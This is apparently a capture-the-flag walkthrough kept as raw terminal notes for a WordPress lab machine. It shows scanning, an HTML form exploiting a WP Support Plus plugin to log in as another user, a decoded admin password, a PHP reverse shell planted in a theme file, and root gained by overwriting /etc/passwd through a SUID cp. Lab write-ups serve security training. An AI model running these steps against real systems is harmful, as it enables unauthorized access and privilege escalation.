└─$ nmap -sV -sC 80 172.16.33.95 --min-rate 900 -Pn
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-13 23:23 PST
Warning: 172.16.33.95 giving up on port because retransmission cap hit (10).
Nmap scan report for 80 (0.0.0.80)
Host is up.
All 1000 scanned ports on 80 (0.0.0.80) are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)

Nmap scan report for 172.16.33.95
Host is up (0.22s latency).
Not shown: 974 closed tcp ports (conn-refused)
PORT      STATE    SERVICE           VERSION
22/tcp    open     ssh               OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 9d:d0:98:da:0d:32:3d:0b:3f:42:4d:d7:93:4f:fd:60 (RSA)
|   256 4c:f4:2e:24:82:cf:9c:8d:e2:0c:52:4b:2e:a5:12:d9 (ECDSA)
|_  256 a9:fb:e3:f4:ba:d6:1e:72:e7:97:25:82:87:6e:ea:01 (ED25519)
80/tcp    open     http              Apache httpd 2.4.29




└─$ dirsearch -u http://172.16.33.95
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/ed/reports/http_172.16.33.95/_25-01-13_23-27-58.txt

Target: http://172.16.33.95/

[23:27:58] Starting: 
[23:29:21] 403 -  277B  - /.ht_wsr.txt
[23:29:21] 403 -  277B  - /.htaccess.save
[23:29:21] 403 -  277B  - /.htaccess_extra
[23:29:21] 403 -  277B  - /.htaccess_sc
[23:29:21] 403 -  277B  - /.htaccessBAK
[23:29:22] 403 -  277B  - /.htaccessOLD2
[23:29:22] 403 -  277B  - /.htpasswds
[23:29:22] 403 -  277B  - /.htpasswd_test
[23:29:22] 403 -  277B  - /.htaccess_orig
[23:29:22] 403 -  277B  - /.html
[23:29:22] 403 -  277B  - /.htaccess.sample
[23:29:23] 403 -  277B  - /.htaccess.orig
[23:29:23] 403 -  277B  - /.httr-oauth
[23:29:24] 403 -  277B  - /.htm
[23:29:27] 403 -  277B  - /.htaccess.bak1
[23:29:28] 403 -  277B  - /.htaccessOLD
[23:29:50] 403 -  277B  - /.php
[23:38:24] 301 -  317B  - /javascript  ->  http://172.16.33.95/javascript/
[23:40:29] 301 -  317B  - /phpmyadmin  ->  http://172.16.33.95/phpmyadmin/
[23:40:43] 200 -    3KB - /phpmyadmin/doc/html/index.html
[23:40:43] 200 -    3KB - /phpmyadmin/
[23:40:43] 200 -    3KB - /phpmyadmin/index.php
[23:41:57] 403 -  277B  - /server-status/
[23:42:01] 403 -  277B  - /server-status
[23:44:27] 200 -    7KB - /wordpress/
[23:44:30] 200 -    2KB - /wordpress/wp-login.php

└─$ wpscan --url http://192.168.56.123/wordpress -e

[+] admin
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://192.168.56.123/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] aarti
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

//user brute force tell us some plugins

 wp-support-plus-responsive-ticket-system
 | Location: http://192.168.56.123/wordpress/wp-content/plugins/wp-support-plus-responsive-ticket-system/
 | Last Updated: 2019-09-03T07:57:00.000Z
 | [!] The version is out of date, the latest version is 9.1.2
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 7.1.3 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.56.123/wordpress/wp-content/plugins/wp-support-plus-responsive-ticket-system/readme.txt

[+] wp-symposium
 | Location: http://192.168.56.123/wordpress/wp-content/plugins/wp-symposium/
 | Last Updated: 2015-08-21T12:36:00.000Z
 | [!] The version is out of date, the latest version is 15.8.1

// ticket system, a vuln 
WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - Privilege Escalation         | php/webapps/41006.txt

//create a html file

<form action="http:/192.168.56.123/wordpress/wp-admin/admin-ajax.php" method="post">
    Username: <input type="text" name="username" value="aarti">
    <input type="hidden" name="email" value="aarti@gmail.com">
    <input type="hidden" name="action" value="loginGuestFacebook">
    <input type="submit" value="Login">
</form>

//after click the submit, we have login as aarti
//it is aarti's account
// switch to http://192.168.56.123/wordpress/wp-admin/profile.php, on the profile page,

Second Flag: 5DD1CC591CE1569A528E3BCF18CEEB5B

RootPassword: SWduaXRlQDEyMw==

➜  ~ echo SWduaXRlQDEyMw== | base64 -d
Ignite@123
//this is the admin passwd of wp application
//login as admin, we can edit the template page, I tried the theme 'twentyseventeen, 404.php
// a php reverse page is wrote there.
//listening on my host:::

$ pwd
/home/raj

$ cat flag1.txt
aHR0cHM6Ly93d3cuaGFja2luZ2FydGljbGVzLmlu

$ find / -perm -u=s 2>/dev/null
/usr/sbin/pppd
/usr/bin/chfn
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/arping
/usr/bin/wget
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/traceroute6.iputils
/usr/bin/gpasswd
/usr/bin/vmware-user-suid-wrapper
/usr/lib/xorg/Xorg.wrap
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine
/bin/fusermount
/bin/umount
/bin/mount
/bin/ping
/bin/cp
/bin/su
/snap/core/6350/bin/mount
/snap/core/6350/bin/ping
/snap/core/6350/bin/ping6
/snap/core/6350/bin/su
/snap/core/6350/bin/umount
/snap/core/6350/usr/bin/chfn
/snap/core/6350/usr/bin/chsh
/snap/core/6350/usr/bin/gpasswd
/snap/core/6350/usr/bin/newgrp
/snap/core/6350/usr/bin/passwd
/snap/core/6350/usr/bin/sudo
/snap/core/6350/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/6350/usr/lib/openssh/ssh-keysign
/snap/core/6350/usr/lib/snapd/snap-confine
/snap/core/6350/usr/sbin/pppd

//for cp has suid, we create a user with root privi then cp it ot overwrite passwd, 
└─$ openssl passwd -1 -salt new 333444
$1$new$j/WIoc8tn3gx4iUHj1V/Z1

└─$ sudo nano passwd 

└─$ python3 -m http.server 8821                          
Serving HTTP on 0.0.0.0 port 8821 (http://0.0.0.0:8821/) ...
192.168.56.123 - - [27/Feb/2025 22:03:06] "GET /passwd HTTP/1.1" 200 -

$ python3 -c "import pty; pty.spawn ('/bin/bash')" 

www-data@ubuntu:/$ su new

new@ubuntu:/root# ls
ls
proof.txt
new@ubuntu:/root# cat proof.txt
cat proof.txt
_________________________________________________________________________
 _____     _   _   U _____ u     U _____ u   _   _       ____     	|	
 |_ " _|   |'| |'|  \| ___"|/     \| ___"|/  | \ |"|     |  _"\   	|
   | |    /| |_| |\  |  _|"        |  _|"   <|  \| |>   /| | | |  	|	
  /| |\   U|  _  |u  | |___        | |___   U| |\  |u   U| |_| |\ 	|
 u |_|U    |_| |_|   |_____|       |_____|   |_| \_|     |____/ u 	|
 _// \\_   //   \\   <<   >>       <<   >>   ||   \\,-.   |||_    	|
(__) (__) (_") ("_) (__) (__)     (__) (__)  (_")  (_/   (__)_)   	|
									|
									|
!! Congrats you have finished this task !!				|
									|
Contact us here:							|
									|
Hacking Articles : https://twitter.com/rajchandel/			|
									|
									|
+-+-+-+-+-+ +-+-+-+-+-+-+-+						|
 |E|n|j|o|y| |H|A|C|K|I|N|G|						|
 +-+-+-+-+-+ +-+-+-+-+-+-+-+				
